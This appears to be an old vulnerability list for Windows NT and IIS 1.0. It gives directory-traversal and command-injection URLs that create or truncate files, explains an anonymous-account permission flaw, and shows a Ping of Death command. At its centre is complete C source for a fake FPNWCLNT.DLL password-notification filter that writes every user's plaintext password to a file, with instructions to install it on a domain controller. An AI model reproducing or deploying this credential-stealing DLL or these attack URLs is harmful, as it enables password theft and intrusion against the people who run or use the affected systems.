Problem: Internet Information Server 1.0 (IIS) allows the use of batch files as CGI applications. Using batch files as CGI applications exposed several security issues in IIS because the batch file processes run in the context of the full Windows NT console command processor (cmd.exe). Problem: Anonymous users have same access rights as Domain Users. Installing IIS on a PDC (typical) results in IUSR_ account becoming member of 'Domain Users'. This gives anonymous guests the access rights of 'Domain Users' group instead of 'Guests' group. Problem: A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory. A URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script. By default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests. Problem: A URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat''. If the file 'target.bat' exists, the file will be truncated. Problem: A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat''. Problem: The registry includes a default entry for which has a value . This is a DLL which normally exists only in an Netware environment. A false FPNWCLNT.DLL can be stored in the %systemroot%\system32 directory which collects passwords in plain text. Comple the below C code and .DEF file into a DLL called FPNWCLNT.DLL and copy it to %systemroot%\system32. Reboot the machine. Password changes and new user creation are funnelled through this DLL with the following information, Username, Plaintext password, RID (relative domain id). Install on the Primary domain controller for an NT domain, and it will capture all users passwords in plain text. Exploit code follows: -----------------cut here-------FPNWCLNT.c----------------------------- #include #include #include struct UNI_STRING { USHORT len; USHORT maxlen; WCHAR *buff; }; static HANDLE fh; BOOLEAN __stdcall InitializeChangeNotify () { DWORD wrote; fh = CreateFile("C:\\temp\\pwdchange.out", GENERIC_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE, 0, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL|FILE_FLAG_WRITE_THROUGH, 0); WriteFile(fh, "InitializeChangeNotify started\n", 31, &wrote, 0); return TRUE; } LONG __stdcall PasswordChangeNotify ( struct UNI_STRING *user, ULONG rid, struct UNI_STRING *passwd ) { DWORD wrote; WCHAR wbuf[200]; char buf[512]; char buf1[200]; DWORD len; memcpy(wbuf, user->buff, user->len); len = user->len/sizeof(WCHAR); wbuf[len] = 0; wcstombs(buf1, wbuf, 199); sprintf(buf, "User = %s : ", buf1); WriteFile(fh, buf, strlen(buf), &wrote, 0); memcpy(wbuf, passwd->buff, passwd->len); len = passwd->len/sizeof(WCHAR); wbuf[len] = 0; wcstombs(buf1, wbuf, 199); sprintf(buf, "Password = %s : ", buf1); WriteFile(fh, buf, strlen(buf), &wrote, 0); sprintf(buf, "RID = %x\n", rid); WriteFile(fh, buf, strlen(buf), &wrote, 0); return 0L; } -----------------------end of FPNWCLNT.c------------------------------------ Problem: Large packet pings (PING -l 65527 -s 1 hostname) otherwise known as 'Ping of Death' can cause a blue screen of death on 3.51 systems: STOP: 0X0000001E KMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS -OR- STOP: 0x0000000A IRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS NT 4.0 is vunerable sending large packets, but does not crash on receiving large packets.